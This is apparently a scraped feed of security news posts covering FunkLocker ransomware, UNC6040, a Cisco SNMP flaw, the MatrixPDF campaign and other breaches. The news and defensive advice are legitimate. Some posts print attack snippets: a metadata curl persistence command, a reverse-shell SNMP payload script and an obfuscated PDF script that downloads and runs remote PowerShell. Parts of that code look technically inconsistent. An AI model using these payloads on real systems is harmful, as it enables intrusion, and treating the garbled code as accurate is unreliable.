• A new ransomware strain, dubbed FunkLocker, is leveraging artificial intelligence to expedite its development, while relying on the abuse of legitimate Windows utilities to disable security defenses and disrupt systems.

    The ransomware, attributed to a group known as FunkSec, highlights a growing trend of threat actors using AI to piece together malware with varying degrees of success.

    The development of FunkLocker appears to follow an “Ask AI → Paste snippet” model, resulting in code that is often inconsistent. While some builds of the ransomware are barely functional, others incorporate more advanced features like anti-virtual machine checks.

    This AI-assisted approach allows for rapid creation but sacrifices the stability and sophistication seen in malware from more established groups. These ransomware needs to be analyzed in safe Sandbox environments.

    Upon execution, FunkLocker aggressively terminates a predefined list of processes and services. It uses standard Windows command-line tools like taskkill.exe to stop applications and sc.exe to halt services.

    This brute-force method often generates numerous errors as it attempts to stop non-existent or protected services, but it ultimately succeeds in crippling system defenses and applications.

    The list of targeted services includes security tools like Windows Defender and Windows Firewall, as well as essential system components like the Shell Experience Host, which causes the victim’s screen to go black.

    Disabling Defenses and Encrypting Files

    According to ANY.RUN sandbox analysis the FunkLocker heavily abuses PowerShell to dismantle security measures systematically.

    It runs a series of commands to disable real-time monitoring in Windows Defender, clear security and application event logs using wevtutil, and bypass the PowerShell execution policy to allow unrestricted script execution.

    To prevent system recovery, the ransomware uses the Volume Shadow Service Administrator tool (vssadmin.exe) to delete all shadow volume copies.

    This action removes the victim’s ability to restore their system from local backups, a common technique used by ransomware to increase pressure on the victim.

    The encryption process is performed entirely locally, meaning FunkLocker does not communicate with a command-and-control (C2) server to retrieve encryption keys.

    Files are encrypted and appended with the .funksec extension. A ransom note is then dropped onto the desktop.

    However, because the malware often terminates the Shell Experience Host service, victims may be unable to view the note without rebooting the compromised system.

    Despite its disruptive capabilities, FunkLocker exhibits signs of poor operational security. Researchers have observed the reuse of Bitcoin wallet addresses across different victims, and analysis suggests that encryption keys are either hardcoded into the malware or derived locally on the victim’s machine.

    These vulnerabilities have allowed security researchers at Avast Labs to develop and release a public decryptor, offering a recovery path for victims.

    Since its emergence in late 2024, the FunkSec group has been linked to attacks on more than 120 organizations worldwide. The group maintains a data leak site where it publicizes stolen information.

    Targets span various sectors, including government, defense, technology, and finance, with a significant number of victims located in the United States, as well as reported incidents in India, Spain, and Mongolia.

    IOCs

    TypeIndicatorDescription
    File Hash (SHA256)c233aec7917cf34294c19dd60ff79a6e0fac5ed6f0cb57af98013c08201a7a1cSHA256 hash of the FunkLocker ransomware executable.
    File Hash (SHA256)e29d95bfb815be80075f0f8bef4fa690abcc461e31a7b3b73106bfcd5cd79033SHA256 hash identified as being associated with a ransom note file.
    File Extension.funksecThe extension appended to files after they have been encrypted by the ransomware.
    Ransom NoteREADME-ZasRvdSR44.mdreadme.txtNames used for the ransom note dropped on the victim’s system. The exact name can vary.
    Threat ActorFunkSecThe Ransomware-as-a-Service (RaaS) group responsible for developing and distributing FunkLocker[, , ].
    Behavioralsc.exetaskkill.exewevtutil.exevssadmin.exeAbuses legitimate Windows command-line tools to stop services, terminate applications, clear security logs, and delete Volume Shadow Copies.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post AI-Powered FunkLocker Ransomware Leverages Windows utilities to Disable Defenses appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Google has published a comprehensive guide aimed at fortifying organizational defenses against UNC6040, a sophisticated threat actor known for targeting cloud environments and enterprise networks.

    Emerging in late 2024, UNC6040 quickly garnered attention for its highly coordinated campaigns, which leverage advanced payload delivery methods and custom malware loaders.

    Initial investigations linked the group’s activity to strategic espionage objectives, with attackers exploiting misconfigured cloud storage and weak API authentication to establish footholds across diverse environments.

    In its guide, Google details the primary attack vectors employed by UNC6040, highlighting spear-phishing emails with weaponized attachments, exploitation of known web application vulnerabilities, and unauthorized use of stolen service account keys.

    By chaining these tactics, UNC6040 operators achieve lateral movement and privilege escalation with minimal detection.

    Google Cloud analysts noted that UNC6040 consistently abuses legitimate administrative tools—such as the Cloud SDK and gcloud CLI—to mask malicious activity and evade standard security telemetry within Google Cloud environments.

    The impact of UNC6040’s operations has been profound for affected enterprises, resulting in data exfiltration, prolonged network compromises, and significant remediation costs.

    Targets include organizations in the technology, defense, and telecommunications sectors, where proprietary data and intellectual property are high-value assets.

    Google’s guide emphasizes the necessity of adopting a defense-in-depth approach, combining proactive threat hunting with continuous monitoring of anomalous behavior and configuration drift.

    Within the guide’s technical deep dive, one essential recommendation is to deploy custom detection rules using Sigma and YARA.

    For example, the following YARA rule snippet can detect UNC6040’s loader binaries by matching on distinctive API invocation patterns:-

    rule UNC6040_Loader_Detection {
        meta:
            description = "Detect UNC6040 custom loader based on API calls"
            author = "Google Cloud Security"
        strings:
            $api1 = "NtCreateUserProcess" wide
            $api2 = "ZwQueueApcThread" wide
            $str1 = "GoogleSecurityClient" ascii
        condition:
            uint16(0) == 0x5A4D and
            2 of ($api*) and
            $str1
    }
    Data Loader attack flow (Source – Google Cloud)

    Persistence Tactics

    A closer examination of UNC6040’s persistence tactics reveals the group’s preference for embedding malicious components into legitimate cloud-native services.

    After initial compromise, UNC6040 operators commonly register forged service accounts with overly permissive roles to maintain long-term access.

    These accounts are configured to execute startup scripts that download and install a custom backdoor—frequently named gtoken_agent—which communicates with command-and-control (C2) servers over encrypted channels.

    Google’s guide shows that the backdoor employs a modular architecture: a primary agent for C2 communication and secondary plugins for credential harvesting and lateral movement.

    Persistence is achieved by creating a covert cron job entry in the metadata server of virtual machines:-

    curl - X POST - H "Metadata-Flavor: Google" \
        --data '{"items":[{"key":"startup-script","value":"bash /opt/gtoken_agent/install.sh"}]}' \
        http://metadata.google.internal/computeMetadata/v1/project/attributes

    This mechanism ensures that the gtoken_agent is reinstalled upon instance reboot, effectively preserving UNC6040’s presence even after remediation efforts.

    Google recommends regular audits of service account roles and metadata attributes, combined with automated validation of metadata changes, to detect and prevent such persistence techniques.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Google Releases Guide to Harden Security Strategy and Detection Capabilities Against UNC6040 appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In today’s fast-paced digital environment, organizations face constant threats from cybercriminals exploiting weaknesses in IT systems. Vulnerability management software is one of the most crucial elements in safeguarding a network, as it helps identify, evaluate, and remediate security gaps before attackers exploit them. By automating vulnerability scanning, prioritizing risks, and offering intelligent patch management, these […]

    The post Top 10 Best Vulnerability Management Software in 2025 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cisco’s Simple Network Management Protocol (SNMP) implementations in IOS and IOS XE have come under intense scrutiny following reports of active exploitation in the wild.

    First disclosed in August 2025, CVE-2025-20352 describes a critical buffer overflow in the SNMP engine that allows unauthenticated remote attackers to execute arbitrary code.

    The vulnerability arises when an oversized payload is sent in a GetBulk request, overrunning an internal buffer and redirecting control flow to attacker-supplied shellcode.

    Initial indicators emerged when network operators began noticing unexplained device reboots and anomalous SNMP traffic patterns.

    Subsequent forensic analysis revealed that compromised routers were pinging external command-and-control servers immediately after handling malformed SNMP requests.

    CISA analysts identified this behavior within weeks of the vulnerability’s public disclosure, warning that adversaries are leveraging CVE-2025-20352 to establish persistent footholds in enterprise networks.

    The impact spans a wide range of Cisco platforms, from ISR 4000 Series routers to Catalyst switches running IOS XE versions prior to 17.10.

    Exploitation requires only network reachability to the SNMP service and no valid credentials, making exposed management interfaces particularly dangerous.

    In one reported incident, attackers deployed a custom payload that established a reverse shell back to an attacker-controlled host, enabling full remote control of the device.

    Infection Mechanism

    Underneath the hood, the attack leverages a malformed PDU that triggers an out-of-bounds write in the SNMP engine’s stack.

    Upon receiving a GetBulk request with a length field exceeding the maximum buffer size, the SNMP handler fails to validate the message size.

    This overflow overwrites the saved return address on the stack, diverting execution to shellcode embedded in the packet.

    Once execution begins, the payload initializes a socket connection back to the attacker’s IP address:-

    from pysnmp.hlapi import *
    payload = b"\x90" * 100 + reverse_shell_shellcode
    sendNotification(
        SnmpEngine(),
        CommunityData('public'),
        UdpTransportTarget(('192.0.2.123', 161)),
        ContextData(),
        NotificationType(
            ObjectIdentity('1.3.6.1.4.1.9.9.96'),
            ('1.3.6.1.4.1.9.9.96.1.1', OctetString(payload))
        )
    )

    The packet structure highlights how the oversized length field and embedded shellcode combine to hijack execution.

    Network defenders are urged to apply the latest Cisco patches immediately and to restrict SNMP access to trusted hosts only.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post CISA Warns of Cisco IOS and IOS XE SNMP Vulnerabilities Exploited in Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Ukraine’s national cyber incident response team, CERT-UA, has issued an urgent warning about a new malware campaign that weaponizes Excel add-in (XLL) files to deploy the CABINETRAT backdoor. Throughout September 2025, CERT-UA analysts discovered multiple malicious XLL files masquerading as benign documents, including “Звернення УБД.xll” and “recept_ruslana_nekitenko.xll,” which exploit Excel’s Add-in Manager and the xlAutoOpen […]

    The post Ukraine Warns of Weaponized XLL Files Delivering CABINETRAT Malware via Zip Archives appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In recent weeks, a novel malware campaign dubbed MatrixPDF has surfaced, targeting Gmail users with carefully crafted emails that slip past conventional spam and phishing filters.

    This campaign has been active since mid-September 2025 and leverages PDF attachments that, when opened, initiate a stealthy infection chain designed to exfiltrate sensitive information and deliver additional payloads.

    Early indicators suggest that attackers are exploiting trust in PDF documents by embedding obfuscated scripts and leveraging legitimate cloud hosting services to host malicious payloads, making detection significantly more challenging.

    The initial wave of attacks delivered emails masquerading as internal organizational communications, complete with realistic headers and sender addresses spoofed to resemble trusted corporate domains.

    Each email contains a PDF attachment named MatrixDoc.pdf, which appears harmless in preview. However, the PDF is crafted with malformed objects and an embedded JavaScript action that automatically executes when the document is opened in compatible viewers.

    Researchers noted that the JavaScript code employs customized obfuscation techniques, including string concatenation and nonstandard encoding schemes, to evade static analysis.

    Varonis analysts identified the MatrixPDF campaign after observing unusual PDF parsing errors across several high-profile enterprise networks.

    JavaScript actions in MatrixPDF, including fake prompts & redirect buttons (Source – Varonis)

    Examination of the malicious documents revealed that the embedded script uses the util.printf() function to dynamically reconstruct and execute a PowerShell command.

    By chaining multiple decoding routines, the malware ultimately invokes:-

    this.exportDataObject({cName: "payload.scr", nLaunch: 2});

    triggering the execution of a secondary executable disguised as a screensaver file. The PowerShell payload then reaches out to a cloud storage bucket to download additional modules, establishing command-and-control communications.

    Further analysis exposed that once the secondary payload is active, it registers a persistence mechanism by creating a hidden scheduled task named MatrixUpdater.

    This task runs every hour, ensuring that the malware can update itself or fetch new instructions without user intervention. Detection evasion is enhanced through intermittent network connections and randomized task names that change with each infection.

    Infection Mechanism

    Delving into the infection mechanism, MatrixPDF begins with PDF JavaScript exploiting the exportDataObject API to extract and launch the malicious .scr file.

    Desktop PDF reader displaying a warning of an external connection (Source – Varonis)

    The embedded script reconstructs a Base64-encoded PowerShell command by piecing together multiple string fragments. A representative snippet is shown below:-

    var part1 = "ZXh0cmFjdC5GaWxl";
    var part2 = "LmQ=";
    var combined = util.stringFromStream(util.createStream({
      cData: part1 + part2
    }));
    eval(combined);

    This obfuscation technique ensures that signature-based defenses struggle to flag the script. Once decoded, the command executes:-

    IEX (New-Object Net.WebClient).DownloadString('https://cloudhost.example.com/update.ps1')

    which retrieves and runs a PowerShell script responsible for deploying the main payload. The script also leverages the Windows Management Instrumentation (WMI) service to check for existing infections, preventing duplicate installations.

    Upon successful download, the PowerShell script writes the payload to %APPDATA%\Local\Matrix\matrix.exe and configures a hidden scheduled task for persistence.

    Through its layered approach, MatrixPDF demonstrates a sophisticated blend of social engineering, scripting abuse, and legitimate hosting infrastructure to compromise Gmail users while maintaining a low forensic footprint.

    Continuous monitoring and heuristic-based PDF analysis are essential to detect and mitigate this emerging threat.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post MatrixPDF Attacks Gmail Users Bypassing Email Filters and Fetch Malicious Payload appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A high-severity security flaw has been disclosed in the One Identity OneLogin Identity and Access Management (IAM) solution that, if successfully exploited, could expose sensitive OpenID Connect (OIDC) application client secrets under certain circumstances. The vulnerability, tracked as CVE-2025-59363, has been assigned a CVSS score of 7.7 out of 10.0. It has been described as a case of

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • WestJet announced a cybersecurity incident in which a sophisticated third-party actor gained unauthorized access to internal systems, exposing personal information of some customers. 

    The breach, discovered on June 13, 2025, has since been contained and remediated, but not before sensitive data elements were exfiltrated.

    WestJet Passenger Data Exposed

    WestJet’s security team first detected anomalous activity on June 13, 2025, triggering an immediate technical and forensic investigation. Attack indicators suggested a targeted compromise of systems storing passenger data. 

    The investigation confirmed that names, dates of birth, mailing addresses, travel documentation details (e.g., passport numbers), and ancillary booking information such as special accommodations and filed complaints were extracted.

    Members of WestJet Rewards had their Rewards ID numbers and points balance at the time of the breach exposed, though passwords and full credit card numbers were not compromised. 

    For holders of WestJet RBC Mastercard products, only the card identifier type (such as “World Elite”) and points balance changes were accessed critical CVV codes, expiry dates, and passwords remained secure. 

    No guest user passwords or CVV numbers were involved, and WestJet’s operational infrastructure integrity was not jeopardized.

    Upon confirming the breach, WestJet secured affected environments and engaged internal and external cybersecurity specialists. 

    Law enforcement agencies, including the Federal Bureau of Investigation (FBI), were notified, and WestJet continues to cooperate fully in the ongoing investigation.

    Customers are advised to remain vigilant by:

    • Reviewing account statements for unauthorized transactions.
    • Placing fraud alerts or security freezes via Equifax, Experian, or TransUnion.
    • Monitoring credit reports at www.annualcreditreport.com.
    • Reporting any suspected identity theft to the Federal Trade Commission or local law enforcement.

    WestJet emphasizes that the security of customer data is paramount and has implemented enhanced intrusion detection, multi-factor authentication (MFA), and regular penetration testing across its networks. 

    Ongoing system hardening and employee security awareness training are being accelerated to prevent future incidents.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

     

    The post WestJet Confirms Data Breach – Customers Personal Information Exposed appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Chinese state-sponsored cyber threat group Salt Typhoon has been targeting global telecommunications infrastructure since at least 2019, exploiting network edge devices to establish deep persistence and harvest vast quantities of sensitive data. Aligned with the Ministry of State Security (MSS), Salt Typhoon focuses on long-term signals intelligence (SIGINT) collection, leveraging front companies and contractor ecosystems […]

    The post Chinese State-Sponsored Hackers Exploiting Network Edge Devices to Harvest Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In August 2025, Australian authorities issued multiple scam alerts after users reported suspicious Facebook groups promoting “active senior trips.” What initially appeared as harmless community gatherings concealed a sophisticated mobile malware operation. ThreatFabric researchers uncovered that these groups were managed by fraudsters who lured seniors into downloading a malicious Android Trojan they have dubbed “Datzbro.” […]

    The post Senior Travel Scams Used by Threat Actors to Distribute Datzbro Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶